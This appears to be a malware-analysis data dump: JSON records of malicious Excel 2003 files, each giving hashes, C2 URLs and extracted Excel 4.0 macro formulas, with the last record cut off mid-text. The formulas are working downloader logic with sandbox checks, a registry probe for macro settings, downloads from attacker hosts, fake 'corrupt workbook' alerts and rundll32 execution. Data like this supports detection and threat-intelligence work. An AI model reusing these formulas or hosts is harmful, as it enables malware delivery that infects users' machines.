{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ce19b9c324bb75ecc6d880e0d76810ff976f24878dcffde6bb5ee502d3af3f2"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7ce19b9c324bb75ecc6d880e0d76810ff976f24878dcffde6bb5ee502d3af3f2","filesize":103941,"md5":"c2148900b02133f1815d533b8e25f47c","sha1":"7c44c37a932fad10e38287c9e01c516f56051002","sha256":"7ce19b9c324bb75ecc6d880e0d76810ff976f24878dcffde6bb5ee502d3af3f2","sha512":"f30565f6211816d5df0b4762776c502b9c7d59a351333dcbad57a28f16f59b627f3cdafe93b8d4f24b92ecf13902ff588ee6b2e672521c5b0c75845db4f66048","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ce19b9c324bb75ecc6d880e0d76810ff976f24878dcffde6bb5ee502d3af3f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7cfcc2432807547965a6ac282e5a1230ac82810a6598f3dd40d1e8aca312bb4b"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7cfcc2432807547965a6ac282e5a1230ac82810a6598f3dd40d1e8aca312bb4b","filesize":171008,"md5":"eeca71e4ef66b7adfd3b3d9cc8c58c76","sha1":"a02f15edf882291a0714493989ccabbffda0cc72","sha256":"7cfcc2432807547965a6ac282e5a1230ac82810a6598f3dd40d1e8aca312bb4b","sha512":"e951f2eef539d1b2817b24ceb1f4a293d26f437cd40d6425da668c037e02bf3fe69f902a976ba43506b612a3ab8ede04085efafcdbd6ee03faeb21bb6366d511","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7cfcc2432807547965a6ac282e5a1230ac82810a6598f3dd40d1e8aca312bb4b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ysO76xo0QQ\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d047807adb718a2d0806ae6d1332a0696447952b70ba7c1f68fbe1efa66a947"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7d047807adb718a2d0806ae6d1332a0696447952b70ba7c1f68fbe1efa66a947","filesize":167936,"md5":"dfdee6984ac2cb6d43a79b28f9b9a77b","sha1":"3ff6cf0ecb67f6966907c4b8af9589ff5e32a8c4","sha256":"7d047807adb718a2d0806ae6d1332a0696447952b70ba7c1f68fbe1efa66a947","sha512":"235437c20862505c2f41464eec28c2c50a19e6495ecfb1aae968a6189959dfb3911994e3a8445b01cb0b8628a14a0e606051a6ed19388489e60c981e183f90ea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d047807adb718a2d0806ae6d1332a0696447952b70ba7c1f68fbe1efa66a947.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xKLZDdW1i1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d20ce5a2bd956426ae9c3a0fa6ab85fbefa0029458c3b4fbc32b2231bc5c0ea"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7d20ce5a2bd956426ae9c3a0fa6ab85fbefa0029458c3b4fbc32b2231bc5c0ea","filesize":206336,"md5":"c2526d28780426d231246a4dead3ad8a","sha1":"cf70cb9e06aada8c75e686db08810e3c7659b90f","sha256":"7d20ce5a2bd956426ae9c3a0fa6ab85fbefa0029458c3b4fbc32b2231bc5c0ea","sha512":"cd52cf5fa3bf9b845ac687650c1e577313318bb03ab58c3ff4dee34668725bbc09d8400cd4450928f6bad9dd50d1ee8964f167d3fa2a2c15c199f95d0f96de98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d20ce5a2bd956426ae9c3a0fa6ab85fbefa0029458c3b4fbc32b2231bc5c0ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bU9zFdjSDj\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d32f4ddffc2bbad251a4fe0ff90c458e53816b098b87dcc4d9acca7bd90a1e3"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d32f4ddffc2bbad251a4fe0ff90c458e53816b098b87dcc4d9acca7bd90a1e3","filesize":167936,"md5":"2173d69ff9774231f7b903e302f08ffd","sha1":"f9b5f6bc0393b0cd27a2e0f25f8263bf2a206c20","sha256":"7d32f4ddffc2bbad251a4fe0ff90c458e53816b098b87dcc4d9acca7bd90a1e3","sha512":"2b66e72d965410d862c7e323a819239231c14812d219ae46a14b9f6e60bac7de75dc9c513f625d097f960fbc45c15c62f032778bb89620c164b24af99f2b0e44","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d32f4ddffc2bbad251a4fe0ff90c458e53816b098b87dcc4d9acca7bd90a1e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3A3awGWdJu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d355a9a5846b5192d32d76eb7da39cbaded100bed839bccb132dbafff4db241"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d355a9a5846b5192d32d76eb7da39cbaded100bed839bccb132dbafff4db241","filesize":185344,"md5":"43623a8606b3717fe321c620b6af812a","sha1":"f7dd3aa6960db35590cd9f4e03529c2cd346476d","sha256":"7d355a9a5846b5192d32d76eb7da39cbaded100bed839bccb132dbafff4db241","sha512":"a86a044ce002ba901b2ab33ce038198586c04dff1676dc4404331b1b7745d656bea0b9bf9f91e4681e7c57b4a5edaa330b3366576f200af40c0e284f409890b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d355a9a5846b5192d32d76eb7da39cbaded100bed839bccb132dbafff4db241.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d4d3bb19aeced9fb05f648bcbd7b3a0aa883a798168bc77592c75c61e50347c"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d4d3bb19aeced9fb05f648bcbd7b3a0aa883a798168bc77592c75c61e50347c","filesize":168448,"md5":"748fd5699900a49abd7c83083919565a","sha1":"76df7658b741aeff435ae6442cc9bb636d0c5609","sha256":"7d4d3bb19aeced9fb05f648bcbd7b3a0aa883a798168bc77592c75c61e50347c","sha512":"bc5d59ee9e38ca5fd412bd6de811c4181622138717f3d4b0fe025b17768e971dd9614c4d728047e448dca596f527d81184c00ad53f727141bbb6d38ba7767632","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d4d3bb19aeced9fb05f648bcbd7b3a0aa883a798168bc77592c75c61e50347c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mkvMTPb5nd\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d5eca9a97920eb7d64d80acd75e59c118023d9aec248c1b96f0fba1c0eb8161"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d5eca9a97920eb7d64d80acd75e59c118023d9aec248c1b96f0fba1c0eb8161","filesize":206336,"md5":"db5f305407a321661e309c9aedf313f2","sha1":"afeb310ad524c8d321808f475d8283c4e60195d9","sha256":"7d5eca9a97920eb7d64d80acd75e59c118023d9aec248c1b96f0fba1c0eb8161","sha512":"562a5bafddfe7fb25134b65d01158bc6cbb20babfbc1d8670b46c00585c874fe8f1c4954ace525d1924f6dd7e20a510f76da239dc9873b58d0bfaa3f88920700","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d5eca9a97920eb7d64d80acd75e59c118023d9aec248c1b96f0fba1c0eb8161.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QsLIxaBueV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d6afe7c128f94d9e42613a87e89305cf5f3636d5beb3573d575a31052e94328"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d6afe7c128f94d9e42613a87e89305cf5f3636d5beb3573d575a31052e94328","filesize":141824,"md5":"5405de57780e5ed6f4bf207002e151ce","sha1":"df6fd4a9f8a7c1be94df2effb88a353ec6c1b2f6","sha256":"7d6afe7c128f94d9e42613a87e89305cf5f3636d5beb3573d575a31052e94328","sha512":"1e4834f262b39088ff05a6645146e5107625e31ae2425b385a3ca91396d72417221a48539d358db5c527658634525ab5426d6c374ff8363011814ef9b7553063","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d6afe7c128f94d9e42613a87e89305cf5f3636d5beb3573d575a31052e94328.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"zKmx4E3Wpm\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d70e6911db36fbfe29bb9e734eb4f4c1a73f2dc11ad5f50cd063edb1794b1a0"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d70e6911db36fbfe29bb9e734eb4f4c1a73f2dc11ad5f50cd063edb1794b1a0","filesize":185344,"md5":"cc05da75e5e328355341b258fc064388","sha1":"745f6e604aec9cf510024e0b5f2f259dbe766b8d","sha256":"7d70e6911db36fbfe29bb9e734eb4f4c1a73f2dc11ad5f50cd063edb1794b1a0","sha512":"68f3784099350d57d282f96f463094741328ddffe312489effc6a4b535b07d9508cf7bc3021a95c845ad758be0be9ae61c7dcb30487c1b7b2991d322a5218254","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d70e6911db36fbfe29bb9e734eb4f4c1a73f2dc11ad5f50cd063edb1794b1a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d7f9477110643a6f9065cc9ed67440aa091e323ba6b981c1fb504fdd797535c"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d7f9477110643a6f9065cc9ed67440aa091e323ba6b981c1fb504fdd797535c","filesize":171008,"md5":"b5d469a07709b5ca6fee934b1e5e8e38","sha1":"a6265d96a7cf33612dc5286e0e91f8ee21909d8c","sha256":"7d7f9477110643a6f9065cc9ed67440aa091e323ba6b981c1fb504fdd797535c","sha512":"0585d161cf59fb6b97d641ad30923d481cd0845e3cd85435ec16a0d06d640b3067516519ae42593ff1ff2685473fd6fbef60c09f4d0b9f7818daaa890f4823a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d7f9477110643a6f9065cc9ed67440aa091e323ba6b981c1fb504fdd797535c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CSHykdYHvi\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d848427042f2839c68353cf99f012fc11a80aa999f558e094535fc2bcd97d8c"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d848427042f2839c68353cf99f012fc11a80aa999f558e094535fc2bcd97d8c","filesize":226304,"md5":"4e7070cd8abfd1c650f0da9fef30bb8e","sha1":"0637cb1688656ca30ef52dff5cca3be741dc01a9","sha256":"7d848427042f2839c68353cf99f012fc11a80aa999f558e094535fc2bcd97d8c","sha512":"a754afd703e74b4adf4cbe8db38ace5444f47a683cc95a6dcad2ba585586ab99d82cc82dbb2aee395097536c4d6c2a446ae9cc4651049a78f9b6b72e4d18a9a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d848427042f2839c68353cf99f012fc11a80aa999f558e094535fc2bcd97d8c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5bH9vUXcd7\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d855b830783a379b6d8286d023a9f4e11256afee6da6f12035d6b2cc93e293a"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d855b830783a379b6d8286d023a9f4e11256afee6da6f12035d6b2cc93e293a","filesize":185344,"md5":"c05e9e1ab06ebe6b3ae0a3928022368f","sha1":"0d5ae8e91fe08ec4479dce6a23775402d3aac1cf","sha256":"7d855b830783a379b6d8286d023a9f4e11256afee6da6f12035d6b2cc93e293a","sha512":"e0cbc435a81fc7003a6807a76bcf481a2952da40955d6d3ca8959455160c21df816888da5bcf8c64c8e573ccf4e81840ca21cad25e779731b6fa3c0292788711","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d855b830783a379b6d8286d023a9f4e11256afee6da6f12035d6b2cc93e293a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d947735226aedbd9db904d2a5698346ad1ef0e29bb0498e62826c2a56fe343b"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d947735226aedbd9db904d2a5698346ad1ef0e29bb0498e62826c2a56fe343b","filesize":141312,"md5":"e7d20ce5b440b5cc92d2754eb723e75d","sha1":"fccb1bcc4af06041e5308ee8af519fe0d8ee9838","sha256":"7d947735226aedbd9db904d2a5698346ad1ef0e29bb0498e62826c2a56fe343b","sha512":"f99b8ecf9931dfafc6bcc6c47b98ecea2dc0b1ab90548ece9970ae49e78617912a470b4ac3618cf0e28df0bbf86e8127e01d74b6c4ce458e3c5a66e8334835bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d947735226aedbd9db904d2a5698346ad1ef0e29bb0498e62826c2a56fe343b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"nNzYsiOgi5\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7d9ca69ae7b02a114eab64494047178f50d114659d2c43b09ad7d811d321df40"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7d9ca69ae7b02a114eab64494047178f50d114659d2c43b09ad7d811d321df40","filesize":152576,"md5":"620ac47982dd965d81cb08016a8e83e5","sha1":"073c3ccf823b730a8ae9a3e36fef4324d6f0a588","sha256":"7d9ca69ae7b02a114eab64494047178f50d114659d2c43b09ad7d811d321df40","sha512":"43aecf554889730b688bc509e195d474bd16369a717ef200650fb9feba2fc5f0b8dd1a42117a55cfb9b1391d2cc52d14f39cc563ca3649b1e8e763414a601573","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7d9ca69ae7b02a114eab64494047178f50d114659d2c43b09ad7d811d321df40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 